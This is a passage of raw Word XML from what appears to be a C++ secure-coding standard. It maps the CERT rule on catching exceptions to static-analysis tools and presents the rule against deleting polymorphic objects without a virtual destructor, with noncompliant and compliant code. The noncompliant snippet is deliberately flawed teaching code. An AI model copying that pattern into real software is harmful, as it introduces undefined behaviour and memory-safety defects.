          <w:p w14:paraId="1B81CDBB" w14:textId="166410CD" w:rsidR="00F72634" w:rsidRDefault="003F364F" w:rsidP="003F364F">
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>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15F6E985" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Heed Compiler Warnings</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Exceptions often relate to the compiler. For example, catching exceptions is important to allow the compiler to unwind the stack in a safe manner.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1A3C43" w14:paraId="172EFA93" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5DE4FC" w14:textId="1EADC4FA" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2670C9" w14:textId="0F8463AD" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C1B5AC" w14:textId="7BBF2A45" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62635B7A" w14:textId="0B817336" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18B948EA" w14:textId="71611C55" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">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A3C43" w14:paraId="5BBDD4A8" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FBCAECC" w14:textId="772EE53A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3843E7A0" w14:textId="77777777" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348AB2BC" w14:textId="2019BA65" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F79C0E" w14:textId="12899C7B" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>527 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012AA30D" w14:textId="1F3B45D8" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="415234C8" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C940DF2" w14:textId="6FE094F1" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId44"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76E7C4D8" w14:textId="5618842C" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34777AB2" w14:textId="022947AA" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>CERT_CPP-ERR51-a</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>CERT_CPP-ERR51-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66AACB9D" w14:textId="48E8B6CA" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Always catch exceptions</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>Each exception explicitly thrown in the code shall have a handler of a compatible type in all call paths that could lead to that point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="177EE248" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09BFA1F8" w14:textId="35E17B37" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId45" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B55B3F" w14:textId="1CB3C800" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>R2020a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237A438D" w14:textId="4EE4548F" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C++: ERR51-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247E2C86" w14:textId="3C89D505" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Checks for unhandled exceptions (rule partially covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="4FD06851" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BB9036" w14:textId="2A03882B" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>PRQA QA-C++</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B986054" w14:textId="5DDB0E43" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>4.4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FB441F9" w14:textId="37DDA25D" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>4035, 4036, 4037</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11539D90" w14:textId="4CAA8CD8" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>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8040651" w:rsidR="00B475A1" w:rsidRDefault="00E86960" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Do not delete a polymorphic object without a virtual destructor</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CE5EC8E" w:rsidR="00B475A1" w:rsidRDefault="00E86960" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polymorphic Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C9484A9" w14:textId="7F1E8F7C" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00E86960">
              <w:t>OOP</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="001A3C43">
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00E86960">
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00E86960">
              <w:t>CPP</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48B2377D" w14:textId="0FC9C2AB" w:rsidR="00B475A1" w:rsidRDefault="00E86960" w:rsidP="00F51FA8">
            <w:r>
              <w:t>Deleting an object through a pointer to a type without a virtual destructor results in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5FD6E70" w:rsidR="00F72634" w:rsidRDefault="00E86960" w:rsidP="0015146B">
            <w:r>
              <w:t>The implicitly declared destructor is not declared as virtual</w:t>
            </w:r>
            <w:r w:rsidR="00B64D61">
              <w:t xml:space="preserve"> in the presence of other virtual functions</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="1F240B56" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34A797E0"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struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Base {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C7A4B29"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  virtual</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1AA2351F"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDC95D7"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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="386D400F"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struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Derived : Base {</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>};</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="523F48F4"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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60DE99BF"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void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BD1DCF"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  Base *b = new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Derived(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="302D7DD8"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  // ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C4193AB" w14:textId="77777777" w:rsidR="00E86960" w:rsidRPr="00E86960" w:rsidRDefault="00E86960" w:rsidP="00E86960">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  delete</w:t>
            </w:r>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>b;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="01CC8C03" w14:textId="38553ECD" w:rsidR="00F72634" w:rsidRDefault="00E86960" w:rsidP="00E86960">
            <w:r w:rsidRPr="00E86960">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>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81D3E3E" w:rsidR="00F72634" w:rsidRDefault="00B64D61" w:rsidP="0015146B">
            <w:r>
              <w:t>The destructor for base is declared explicitly as a virtual destructor. This guarantees that the polymorphic delete operation will have well-defined behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="2A6DB0E0" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="391FE86C"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struct Base {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18244995"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virtual ~Base() = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>default;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4327A482"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virtual void f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="62DEDEB9"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1354B2"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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA5034F"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struct Derived : Base {</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>};</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="087CD4F4"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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="380253A8"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void f() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5024A7"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Base *b = new Derived(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="399B0597"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 ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B32536A"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delete </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0D2047C3" w14:textId="24B6D004" w:rsidR="00F72634" w:rsidRPr="00B64D61" w:rsidRDefault="00B64D61" w:rsidP="00B64D61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B64D61">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6D1AF28F" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
